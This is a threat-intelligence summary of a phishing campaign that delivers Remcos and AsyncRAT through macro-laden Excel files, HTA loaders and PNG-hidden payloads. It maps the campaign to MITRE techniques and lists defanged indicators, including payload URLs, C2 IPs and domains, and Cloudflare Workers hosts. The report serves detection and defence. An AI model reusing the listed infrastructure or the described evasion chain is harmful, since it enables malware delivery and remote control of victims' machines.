LevelBlue SpiderLabs tracked a global phishing campaign using malicious Excel attachments to deliver multi-stage payloads that ultimately deployed Remcos and AsyncRAT. The operators used heavy obfuscation, disposable infrastructure, and themed HTA filenames to hide activity across multiple industries and countries. #Remcos #AsyncRAT #CloudflareWorkers #workersdev
Keypoints
- LevelBlue SpiderLabs observed an active phishing campaign distributing malicious Excel spreadsheet attachments over a two-week period.
- The campaign expanded from a limited phishing attempt into a widespread operation affecting organizations in manufacturing, media, professional services, agriculture, and chemicals.
- Victims were globally distributed across Europe, the Asia-Pacific region, and the Americas, with emails seen in English, Polish, Chinese, and Thai.
- The infection chain used multiple stages: malicious spreadsheet macro, HTA loader, script execution, and final payload delivery.
- The campaign delivered Remcos and AsyncRAT, and may also have distributed FormBook and Lumma.
- Attackers used obfuscation methods including URL shorteners, padded HTA files, Base64 encoding, PNG-embedded payloads, and Cloudflare Workers infrastructure.
- The operators used unusual positive-sounding HTA filenames and rotating infrastructure, suggesting automation and high-volume campaign generation.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Malicious emails delivered weaponized spreadsheet attachments to targeted staff (‘phishing emails deliver weaponized .xls files’).
- [T1204.002] User Execution: Malicious File – The victim had to open the spreadsheet and enable macros to start the infection chain (‘opens .xls attachment and enables macros’).
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Embedded VBA in the Excel droppers fetched the HTA payload (‘Embedded VBA macros in .xls droppers fetch and launch the HTA second stage’).
- [T1218.005] System Binary Proxy Execution: Mshta – HTA files were executed through mshta.exe to run the next stage (‘HTA files executed via mshta.exe’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA payload contained JavaScript used for staging and retrieving payloads (‘HTA payloads contain JavaScript responsible for staging and payload retrieval’).
- [T1102] Web Service – The attack used web services for geolocation lookup and staged content retrieval (‘query geoplugin[.]net for victim geolocation’).
- [T1071.001] Application Layer Protocol: Web Protocols – HTTP/HTTPS supported downloads, redirects, and C2 communication (‘HTTP/HTTPS used for HTA download, PNG stager retrieval, URL shortener redirects’).
- [T1027] Obfuscated Files or Information – The attackers concealed payloads using padding, Base64, decoy strings, and PNG steganography (‘PNG files used for steganography’).
- [T1497] Virtualization/Sandbox Evasion – The samples used environment checks and anti-analysis behavior (‘geolocation-based execution gating; long sleep intervals and anti-debug tags’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Remcos configurations enabled Run key persistence (‘enable HKCU and HKLM Run key persistence’).
- [T1056.001] Input Capture: Keylogging – Remcos and AsyncRAT were observed enabling keylogging (‘observed enabling keylogging’).
- [T1573] Encrypted Channel – Remcos C2 traffic used encrypted communications (‘RC4-encrypted communications with TLS certificate material’).
Indicators of Compromise
- [SHA256] Analyzed malicious spreadsheet attachment delivering AsyncRAT – 49c7b4eb6620917ee7ca796472b7af9f01ea6f7f80391ae7eb7bd8dabe0b7249
- [URL] URL shorteners used to redirect to HTA payloads – https://cuth[.]me/sse8kU, https://masuk[.]to/FdpxBG
- [URL] Obfuscated payload retrieval and hosted stages – https://as[.]al/file/KBn1RC, http://107.172.235[.]213/87/img_015059.png
- [URL] Remcos and AsyncRAT payload hosting – http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta, hxxp://198.12.83[.]75/98/img_194618.png
- [IP] Remcos C2 infrastructure – 173.231.188[.]244:14641, 192.227.219[.]79:4550
- [Domain] Remcos command-and-control domain – ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647
- [Hostname] Cloudflare Workers hosts used for multiple payloads – icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev, dawn-bush-ddd1.yasminanthonyy.workers[.]dev
- [Hostname] Additional Cloudflare Workers host observed in the campaign – small-morning-8be0.fsocietyandtools.workers[.]dev